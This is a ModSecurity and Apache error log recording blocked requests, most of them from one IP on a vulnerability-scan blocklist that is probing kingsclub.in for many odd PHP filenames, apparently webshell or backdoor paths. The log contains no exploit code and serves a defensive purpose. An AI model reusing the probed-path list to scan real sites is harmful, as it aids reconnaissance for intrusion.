[Tue May 26 18:06:17.907236 2026] [security2:error] [pid 960743:tid 960804] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/vx.php"] [unique_id "ahWTwfQvEln_BHBy2zJ_aQAA7Dw"]
[Tue May 26 18:06:17.907447 2026] [security2:error] [pid 960743:tid 960976] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/vx.php"] [unique_id "ahWTwfQvEln_BHBy2zJ_aQAA7Dw"]
[Tue May 26 18:06:18.118975 2026] [security2:error] [pid 960743:tid 960785] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/ff1.php"] [unique_id "ahWTwvQvEln_BHBy2zJ_cQAAwyk"]
[Tue May 26 18:06:18.119387 2026] [security2:error] [pid 960743:tid 960935] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/ff1.php"] [unique_id "ahWTwvQvEln_BHBy2zJ_cQAAwyk"]
[Tue May 26 18:06:18.329070 2026] [security2:error] [pid 960743:tid 960801] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/explorer/index_.php"] [unique_id "ahWTwvQvEln_BHBy2zJ_egAAxzk"]
[Tue May 26 18:06:18.329326 2026] [security2:error] [pid 960743:tid 960939] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/explorer/index_.php"] [unique_id "ahWTwvQvEln_BHBy2zJ_egAAxzk"]
[Tue May 26 18:06:18.352987 2026] [security2:error] [pid 960743:tid 960916] [client 185.192.70.74:64381] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/adminfuns.php"] [unique_id "ahWTwvQvEln_BHBy2zJ_ewAAALA"]
[Tue May 26 18:06:18.531070 2026] [security2:error] [pid 960743:tid 960779] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/error.php"] [unique_id "ahWTwvQvEln_BHBy2zJ_fQAAxSM"]
[Tue May 26 18:06:18.531281 2026] [security2:error] [pid 960743:tid 960937] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/error.php"] [unique_id "ahWTwvQvEln_BHBy2zJ_fQAAxSM"]
[Tue May 26 18:06:18.721789 2026] [security2:error] [pid 960743:tid 960810] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/333.php"] [unique_id "ahWTwvQvEln_BHBy2zJ_hgAA40I"]
[Tue May 26 18:06:18.722026 2026] [security2:error] [pid 960743:tid 960967] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/333.php"] [unique_id "ahWTwvQvEln_BHBy2zJ_hgAA40I"]
[Tue May 26 18:06:18.938247 2026] [security2:error] [pid 960743:tid 960820] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/ftde.php"] [unique_id "ahWTwvQvEln_BHBy2zJ_kwAAykw"]
[Tue May 26 18:06:18.938408 2026] [security2:error] [pid 960743:tid 960942] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/ftde.php"] [unique_id "ahWTwvQvEln_BHBy2zJ_kwAAykw"]
[Tue May 26 18:06:19.129160 2026] [security2:error] [pid 960743:tid 960828] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/app.php"] [unique_id "ahWTw_QvEln_BHBy2zJ_mwAA8lQ"]
[Tue May 26 18:06:19.129442 2026] [security2:error] [pid 960743:tid 960982] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/app.php"] [unique_id "ahWTw_QvEln_BHBy2zJ_mwAA8lQ"]
[Tue May 26 18:06:19.317782 2026] [security2:error] [pid 960743:tid 960808] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/cilus.php"] [unique_id "ahWTw_QvEln_BHBy2zJ_nwAA50A"]
[Tue May 26 18:06:19.317955 2026] [security2:error] [pid 960743:tid 960971] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/cilus.php"] [unique_id "ahWTw_QvEln_BHBy2zJ_nwAA50A"]
[Tue May 26 18:06:19.523540 2026] [security2:error] [pid 960743:tid 960851] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/a5.php"] [unique_id "ahWTw_QvEln_BHBy2zJ_tQAAsms"]
[Tue May 26 18:06:19.523771 2026] [security2:error] [pid 960743:tid 960918] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/a5.php"] [unique_id "ahWTw_QvEln_BHBy2zJ_tQAAsms"]
[Tue May 26 18:06:19.546259 2026] [security2:error] [pid 960743:tid 960946] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTw_QvEln_BHBy2zJ_mQAAAM4"]
[Tue May 26 18:06:19.731959 2026] [security2:error] [pid 960743:tid 960849] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/test.php"] [unique_id "ahWTw_QvEln_BHBy2zJ_zwAAn2k"]
[Tue May 26 18:06:19.732150 2026] [security2:error] [pid 960743:tid 960899] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/test.php"] [unique_id "ahWTw_QvEln_BHBy2zJ_zwAAn2k"]
[Tue May 26 18:06:19.774959 2026] [security2:error] [pid 960743:tid 960881] [client 185.192.70.80:52823] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 80.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/css/autoload_classmap.php"] [unique_id "ahWTw_QvEln_BHBy2zJ_1QAAAI0"]
[Tue May 26 18:06:19.919532 2026] [security2:error] [pid 960743:tid 960867] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/aa.php"] [unique_id "ahWTw_QvEln_BHBy2zJ_1gAAuns"]
[Tue May 26 18:06:19.919825 2026] [security2:error] [pid 960743:tid 960926] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/aa.php"] [unique_id "ahWTw_QvEln_BHBy2zJ_1gAAuns"]
[Tue May 26 18:06:20.113197 2026] [security2:error] [pid 960743:tid 960865] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/term.php"] [unique_id "ahWTxPQvEln_BHBy2zJ_3wAA3Xk"]
[Tue May 26 18:06:20.113354 2026] [security2:error] [pid 960743:tid 960961] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/term.php"] [unique_id "ahWTxPQvEln_BHBy2zJ_3wAA3Xk"]
[Tue May 26 18:06:20.304043 2026] [security2:error] [pid 960743:tid 960863] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/file61.php"] [unique_id "ahWTxPQvEln_BHBy2zJ_5AAAqXc"]
[Tue May 26 18:06:20.304303 2026] [security2:error] [pid 960743:tid 960909] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/file61.php"] [unique_id "ahWTxPQvEln_BHBy2zJ_5AAAqXc"]
[Tue May 26 18:06:20.500465 2026] [security2:error] [pid 960743:tid 960864] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/la.php"] [unique_id "ahWTxPQvEln_BHBy2zJ_7QAA1Hg"]
[Tue May 26 18:06:20.500667 2026] [security2:error] [pid 960743:tid 960952] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/la.php"] [unique_id "ahWTxPQvEln_BHBy2zJ_7QAA1Hg"]
[Tue May 26 18:06:20.692676 2026] [security2:error] [pid 960743:tid 960747] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/first.php"] [unique_id "ahWTxPQvEln_BHBy2zJ_9gAA5wM"]
[Tue May 26 18:06:20.692951 2026] [security2:error] [pid 960743:tid 960971] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/first.php"] [unique_id "ahWTxPQvEln_BHBy2zJ_9gAA5wM"]
[Tue May 26 18:06:20.962953 2026] [security2:error] [pid 960743:tid 960875] [client 114.119.136.215:45511] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "virgence.com"] [uri "/index.php/portfolio_page/pale-skin-apparel"] [unique_id "ahWTxPQvEln_BHBy2zKAAAAAAIc"], referer: https://virgence.com/index.php/portfolio_page/pale-skin-apparel
[Tue May 26 18:06:21.041021 2026] [security2:error] [pid 960743:tid 960870] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/pass4.php"] [unique_id "ahWTxfQvEln_BHBy2zKABQAA5X4"]
[Tue May 26 18:06:21.041211 2026] [security2:error] [pid 960743:tid 960969] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/pass4.php"] [unique_id "ahWTxfQvEln_BHBy2zKABQAA5X4"]
[Tue May 26 18:06:21.230699 2026] [security2:error] [pid 960743:tid 960745] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-firewall.php"] [unique_id "ahWTxfQvEln_BHBy2zKAEAAA0QE"]
[Tue May 26 18:06:21.230864 2026] [security2:error] [pid 960743:tid 960949] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-firewall.php"] [unique_id "ahWTxfQvEln_BHBy2zKAEAAA0QE"]
[Tue May 26 18:06:21.420079 2026] [security2:error] [pid 960743:tid 960750] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/lv.php"] [unique_id "ahWTxfQvEln_BHBy2zKAFAAA5gY"]
[Tue May 26 18:06:21.420299 2026] [security2:error] [pid 960743:tid 960970] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/lv.php"] [unique_id "ahWTxfQvEln_BHBy2zKAFAAA5gY"]
[Tue May 26 18:06:21.629512 2026] [security2:error] [pid 960743:tid 960896] [client 185.192.70.77:34183] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp_wlx.php"] [unique_id "ahWTxfQvEln_BHBy2zKAHwAAAJw"]
[Tue May 26 18:06:21.641089 2026] [security2:error] [pid 960743:tid 960749] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/yas.php"] [unique_id "ahWTxfQvEln_BHBy2zKAIAAAmwU"]
[Tue May 26 18:06:21.641279 2026] [security2:error] [pid 960743:tid 960895] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/yas.php"] [unique_id "ahWTxfQvEln_BHBy2zKAIAAAmwU"]
[Tue May 26 18:06:22.003200 2026] [security2:error] [pid 960743:tid 960752] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-trackback.php"] [unique_id "ahWTxvQvEln_BHBy2zKAMgAAlQg"]
[Tue May 26 18:06:22.003452 2026] [security2:error] [pid 960743:tid 960889] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-trackback.php"] [unique_id "ahWTxvQvEln_BHBy2zKAMgAAlQg"]
[Tue May 26 18:06:22.329785 2026] [security2:error] [pid 960743:tid 960967] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTxfQvEln_BHBy2zKALQAAAOM"]
[Tue May 26 18:06:22.385423 2026] [security2:error] [pid 960743:tid 960757] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/png.php"] [unique_id "ahWTxvQvEln_BHBy2zKARgAA9A0"]
[Tue May 26 18:06:22.385651 2026] [security2:error] [pid 960743:tid 960984] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/png.php"] [unique_id "ahWTxvQvEln_BHBy2zKARgAA9A0"]
[Tue May 26 18:06:22.573728 2026] [security2:error] [pid 960743:tid 960755] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-at.php"] [unique_id "ahWTxvQvEln_BHBy2zKATAAA-ws"]
[Tue May 26 18:06:22.573902 2026] [security2:error] [pid 960743:tid 960991] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-at.php"] [unique_id "ahWTxvQvEln_BHBy2zKATAAA-ws"]
[Tue May 26 18:06:22.724506 2026] [security2:error] [pid 960743:tid 960919] [client 113.176.76.84:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTxvQvEln_BHBy2zKAQwAAALM"]
[Tue May 26 18:06:22.786011 2026] [security2:error] [pid 960743:tid 960753] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/database.php"] [unique_id "ahWTxvQvEln_BHBy2zKAVwAA8Qk"]
[Tue May 26 18:06:22.786259 2026] [security2:error] [pid 960743:tid 960981] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/database.php"] [unique_id "ahWTxvQvEln_BHBy2zKAVwAA8Qk"]
[Tue May 26 18:06:22.975724 2026] [security2:error] [pid 960743:tid 960754] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/like.php"] [unique_id "ahWTxvQvEln_BHBy2zKAXwAA_wo"]
[Tue May 26 18:06:22.975929 2026] [security2:error] [pid 960743:tid 960995] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/like.php"] [unique_id "ahWTxvQvEln_BHBy2zKAXwAA_wo"]
[Tue May 26 18:06:23.226426 2026] [security2:error] [pid 960743:tid 960830] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/xxx.php"] [unique_id "ahWTx_QvEln_BHBy2zKAZAAAnFY"]
[Tue May 26 18:06:23.226635 2026] [security2:error] [pid 960743:tid 960896] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/xxx.php"] [unique_id "ahWTx_QvEln_BHBy2zKAZAAAnFY"]
[Tue May 26 18:06:23.436580 2026] [security2:error] [pid 960743:tid 960829] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/new.php"] [unique_id "ahWTx_QvEln_BHBy2zKAbgAA31U"]
[Tue May 26 18:06:23.436803 2026] [security2:error] [pid 960743:tid 960963] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/new.php"] [unique_id "ahWTx_QvEln_BHBy2zKAbgAA31U"]
[Tue May 26 18:06:23.515569 2026] [proxy:error] [pid 960743:tid 960885] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:06:23.515632 2026] [proxy_http:error] [pid 960743:tid 960885] [client 43.157.149.188:35520] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:06:23.516259 2026] [proxy:error] [pid 960743:tid 960885] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:06:23.516289 2026] [proxy_http:error] [pid 960743:tid 960885] [client 43.157.149.188:35520] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:06:23.625984 2026] [security2:error] [pid 960743:tid 960836] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/sid3.php"] [unique_id "ahWTx_QvEln_BHBy2zKAcwAAylw"]
[Tue May 26 18:06:23.626167 2026] [security2:error] [pid 960743:tid 960942] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/sid3.php"] [unique_id "ahWTx_QvEln_BHBy2zKAcwAAylw"]
[Tue May 26 18:06:23.846171 2026] [security2:error] [pid 960743:tid 960827] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/txets.php"] [unique_id "ahWTx_QvEln_BHBy2zKAdwAApVM"]
